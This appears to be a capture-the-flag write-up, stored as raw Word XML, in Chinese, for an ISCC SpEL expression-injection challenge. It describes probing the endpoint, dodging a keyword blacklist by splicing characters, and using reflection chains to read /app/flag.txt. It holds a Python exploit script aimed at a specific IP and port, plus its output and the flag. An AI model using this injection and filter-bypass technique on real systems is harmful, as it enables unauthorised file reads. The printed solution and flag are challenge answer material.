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der-n0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Solution</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="header-n3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探寻注入点与安全过滤机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先对目标接口进行基础的测试与探测：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1+2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">得到了结果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，由此证明传入的参数确实被当作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SpEL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表达式进行了解析和计算。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''.class.name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成功回显</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">java.lang.String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，表明当前环境允许获取并访问类对象信息。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尝试执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">T(java.lang.Math).abs(-3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，系统抛出报错</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Expression Error: EL1005E: Type cannot be found 'java.lang.Math'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这说明使用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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接引用类型的方式受到了限制，不过通过对象属性的链式访问依然是可行的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进一步深入测试可以发现，常规的无参方法是能够以访问属性的形式来调用的（比如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">''.class.package</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">toURI.toURL.getContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。与此同时，诸如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">readAllBytes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这样的高危关键字字符串会被直接拦截，这就意味着我们无法在请求中明文包含这些完整的敏感词汇。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n13"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合字符拼接突破黑名单获取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为了突破上述限制，我们可以采用基于字符串索引逐个字符提取的方式，组合构造出那些被屏蔽的属性名称。这样一来，安全过滤器检测到的只是一堆毫无威胁的字符碎片，而在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SpEL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实际运算时，这些碎片却能被动态拼接还原为真实有效的方法名。绕过限制后，先通过反射机制获取到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">java.io.File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对象，接着根据当前系统上下文的目录层级结构寻址到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/flag.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，最终调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getContent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w: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</w:rPr>
        <w:t xml:space="preserve">readAllBytes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取该文件的完整字节数据流。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具体的自动化利用代码实现如下：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quote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"http://39.105.213.28:12603/api/route?expr="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FILE_CLASS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"''.class.module.class.declaredMethods[6].returnType.declaredMethods[58].parameterTypes[1]"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG_FILE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".listRoots[0].listFiles[20].listFiles[0]"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG_STREAM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".toURI.toURL.getContent"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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"('ar'[1])"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"('he'[1])"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"('at'[0])"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"('do'[0])"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"('ac'[1])"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"('Ax'[0])"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"('la'[0])"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"('By'[0])"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"('ya'[0])"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"('ta'[0])"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"('sa'[0])"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"('am'[1])"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"('ok'[1])"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"('So'[0])"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"('up'[0])"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"('up'[1])"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"('do'[1])"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"('an'[1])"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"('ag'[1])"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"('he'[0])"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"('in'[0])"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spell(name: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.join(CHARS[ch]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expr_prop(target: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spell(prop)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ensure_text(expr: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f"empty response for expr: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request_expr(expr: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quote(expr, safe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requests.Session()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session.get(url,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expr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(attempt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(last_err)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expr_prop(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"''.class"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"package"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sanity:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, test_expr)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(request_expr(test_expr))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    mark_expr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expr_prop(FLAG_STREAM, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"markSupported"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stream test:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, mark_expr)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(request_expr(mark_expr))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    read_expr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expr_prop(FLAG_STREAM, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"readAllBytes"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len_expr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".length"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(ensure_text(len_expr, request_expr(len_expr)))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byte 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(length):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        item_expr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read_expr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(ensure_text(item_expr, request_expr(item_expr)))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        data.append(val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sys.stderr.write(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\r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sys.stderr.flush()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    sys.stderr.write(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p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本在本地环境的执行输出结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] sanity: ''.class[('up'[1])+('at'[0])+('ac'[1])+('ok'[1])+('at'[0])+('ag'[1])+('he'[1])]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">package java.lang</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] stream test: ''.class.module.class.declaredMethods[6].returnType.declaredMethods[58].parameterTypes[1].listRoots[0].listFiles[20].listFiles[0].toURI.toURL.getContent[('am'[1])+('at'[0])+('ar'[1])+('ok'[1])+('So'[0])+('up'[0])+('up'[1])+('up'[1])+('do'[1])+('ar'[1])+('ta'[0])+('he'[1])+('do'[0])]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[*] byte length: 41</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{SpEL_D0ubl3_Enc0d1ng_Bypass_202605}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="header-n19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ISCC{SpEL_D0ubl3_Enc0d1ng_Bypass_202605}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2026-05-18T04:04:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T04:04:36Z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